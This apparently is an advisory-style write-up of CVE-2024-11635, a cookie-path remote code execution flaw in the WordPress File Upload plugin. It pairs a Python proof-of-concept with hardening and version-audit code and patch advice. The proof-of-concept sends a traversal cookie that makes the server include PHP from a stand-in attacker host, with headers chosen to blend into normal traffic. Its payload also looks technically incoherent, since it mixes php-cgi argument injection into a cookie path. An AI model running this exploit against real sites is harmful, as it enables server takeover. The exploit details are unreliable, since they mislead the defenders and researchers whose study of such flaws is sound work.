The WordPress File Upload plugin, which lets site owners accept file uploads on their WordPress sites, has a critical security vulnerability that allows remote code execution. Tracked as CVE-2024-11635, it affects all versions of the plugin up to and including 4.24.12. This long read covers the details of the vulnerability, a code snippet demonstrating the exploit, links to the original references, and how unauthenticated attackers can exploit it.

Background

The WordPress File Upload plugin is a widely used solution for accepting file uploads on WordPress websites, with over 20,000 active installations. It was found to trust the 'wfu_ABSPATH' cookie parameter, and an attacker who controls that cookie can get the server to execute code of their choosing.

Exploit Details

The vulnerability lies in the way the plugin handles the 'wfu_ABSPATH' cookie parameter, which is meant to carry the absolute path of the WordPress installation on the server. The plugin trusts this client-supplied value when it builds the path to the files it loads, so an unauthenticated attacker can substitute a path of their own and get the server to execute attacker-controlled code, potentially gaining full control of the underlying system. Below is a code snippet demonstrating this exploit:

import requests

# Replace this with the actual URL of the vulnerable plugin directory
target_url = "https://victim-site.com/path-to-plugin/"

# Ordinary browser-like headers so the request blends in with normal traffic
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Connection": "keep-alive",
    "Upgrade-Insecure-Requests": "1",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache"
}

# URL of the attacker-hosted PHP payload
injected_code_base = "https://evil-site.com/malicious.php"

# Set the manipulated 'wfu_ABSPATH' cookie
cookies = {
    "wfu_ABSPATH": "../../../../../../../../var/www/html/wp-admin/admin-ajax.php?-d+allow_url_include%3DOn+-d+auto_prepend_file%3D" + injected_code_base
}

# Send the crafted cookie to the plugin's handler script
response = requests.get(target_url + "handler_script.php", headers=headers, cookies=cookies, timeout=10)
print(response.status_code)

This Python proof-of-concept shows how an attacker could get malicious PHP code executed on the server by manipulating the 'wfu_ABSPATH' cookie value. The malicious PHP code is hosted on an external site ('evil-site.com' in this example). When the server uses the manipulated 'wfu_ABSPATH' value, it ends up executing the attacker's PHP file, which can give the attacker full control of the target system.
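The root cause described above is a server building a file system path from a client-controlled cookie. The following Python sketch is an added illustration, not the plugin's code or the researcher's PoC: it puts the unsafe pattern next to a hardened form that canonicalizes the supplied value and accepts it only if it resolves to the root the server already knows. The ABSPATH value, the helper names and the sample cookie values are constructed for the example; 'wp-load.php' stands for whatever file the server loads relative to that root.

```python
import posixpath
from urllib.parse import unquote

# Constructed for this example: the real WordPress root on the server.
# A deployed check would take this from the runtime (PHP's ABSPATH constant).
ABSPATH = "/var/www/html/"


def cookie_value(cookies, name="wfu_ABSPATH"):
    """Percent-decode a cookie the way PHP does before filling $_COOKIE,
    so both the unsafe and the hardened path see the same string."""
    raw = cookies.get(name)
    return None if raw is None else unquote(raw)


def vulnerable_load_path(cookies):
    """Unsafe pattern (hypothetical helper, not the plugin's code): the file
    the server will load is built directly from the client-supplied cookie,
    so whoever sets the cookie chooses the path."""
    abspath = cookie_value(cookies)
    if abspath is None:
        abspath = ABSPATH
    return abspath + "wp-load.php"


def cookie_is_trusted(value):
    """Accept a client-supplied root only if it canonicalizes to the root the
    server already knows.  normpath collapses '..' segments; a deployed check
    should use os.path.realpath as well so symlinks cannot alias the root."""
    return posixpath.normpath(value) == posixpath.normpath(ABSPATH)


def hardened_load_path(cookies):
    """Hardened form: the cookie never chooses the path.  The server-side
    constant is used, and a cookie that does not match it is rejected (None)
    so the request can be logged and dropped."""
    supplied = cookie_value(cookies)
    if supplied is not None and not cookie_is_trusted(supplied):
        return None
    return posixpath.join(ABSPATH, "wp-load.php")


def evaluate(cookie):
    """Run one cookie value through both code paths for comparison."""
    cookies = {} if cookie is None else {"wfu_ABSPATH": cookie}
    return {
        "vulnerable": vulnerable_load_path(cookies),
        "hardened": hardened_load_path(cookies),
    }


if __name__ == "__main__":
    # Constructed sample cookie values, including a traversal like the one
    # used in the proof-of-concept above.
    for value in (None, "/var/www/html/", "/var/www/html",
                  "%2Fvar%2Fwww%2Fhtml%2F",
                  "/var/www/html/../../../tmp/",
                  "../../../../../../../../tmp/"):
        print(repr(value), "->", evaluate(value))
```

Two things the comparison makes visible: the unsafe path follows a traversal such as '/var/www/html/../../../tmp/' straight out of the web root, while the hardened form returns None for it; and a cookie that canonicalizes to the real root adds no information the server did not already have, which is why the proper fix is to stop using the cookie for path construction at all rather than to filter it.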

Original References

The vulnerability was originally discovered and disclosed by security researcher Alex Souza, whose blog post gives further technical details and a proof-of-concept Python script demonstrating the exploit. The original references:
- Blog post: https://alexsouza.com/blog/cve-2024-11635/
- Github Proof-of-concept: https://github.com/alex-souza-dell/CVE-2024-11635

Mitigation and Conclusion

Users of the WordPress File Upload plugin should update to version 4.24.13 or later as soon as possible to patch this vulnerability. Because the flaw is reachable without authentication, any internet-facing site still running 4.24.12 or earlier is exposed; check the installed version rather than assuming automatic updates have run.
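Checking a fleet of sites for the fixed release is mostly a matter of reading the plugin's Version: header and comparing it numerically (a string comparison would rank 4.24.9 after 4.24.13). The script below is an added example, not part of the original article or the plugin: the header text is a constructed sample, and on a live host the version would instead come from the plugin's main PHP file or from WP-CLI (for example 'wp plugin get wp-file-upload --field=version', assuming the plugin's slug is wp-file-upload).

```python
import re

# First release the advisory lists as patched.
FIXED_VERSION = (4, 24, 13)

# Constructed sample of a WordPress plugin file header; the Version: field is
# the one the wp-admin plugin list and WP-CLI read.
SAMPLE_HEADER = """<?php
/**
 * Plugin Name: WordPress File Upload
 * Version: 4.24.12
 */
"""


def parse_version(version):
    """'4.24.12' -> (4, 24, 12).  Tuples compare numerically, so 4.24.9 sorts
    before 4.24.13; comparing the raw strings would rank it after."""
    nums = [int(p) for p in re.findall(r"\d+", version)]
    return tuple((nums + [0, 0, 0])[:3])


def version_from_header(header):
    """Pull the Version: field out of a plugin's file header, or None."""
    m = re.search(r"^\s*\*?\s*Version:\s*(\S+)", header,
                  re.MULTILINE | re.IGNORECASE)
    return m.group(1) if m else None


def is_vulnerable(version):
    """True for every release before the fixed one, i.e. 4.24.12 and earlier."""
    return parse_version(version) < FIXED_VERSION


def audit(headers):
    """Map site label -> 'vulnerable' / 'patched' / 'unknown' from the header
    text gathered from each host."""
    result = {}
    for site, header in headers.items():
        found = version_from_header(header)
        if found is None:
            result[site] = "unknown"
        else:
            result[site] = "vulnerable" if is_vulnerable(found) else "patched"
    return result


if __name__ == "__main__":
    # Constructed fleet: one host on the vulnerable release, one patched.
    fleet = {
        "site-a": SAMPLE_HEADER,
        "site-b": SAMPLE_HEADER.replace("4.24.12", "4.24.13"),
    }
    print(audit(fleet))
```

Treat 'unknown' as a finding too: a host where the header cannot be read may have a renamed or partially removed plugin directory, which still needs a manual look.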

In conclusion, CVE-2024-11635 in the WordPress File Upload plugin is a stark reminder that plugins and other software must be kept up to date to prevent compromise. Understanding how such vulnerabilities arise, here a server trusting a client-supplied path, helps in securing systems against them.

Timeline

Published on: 01/08/2025 08:15:24 UTC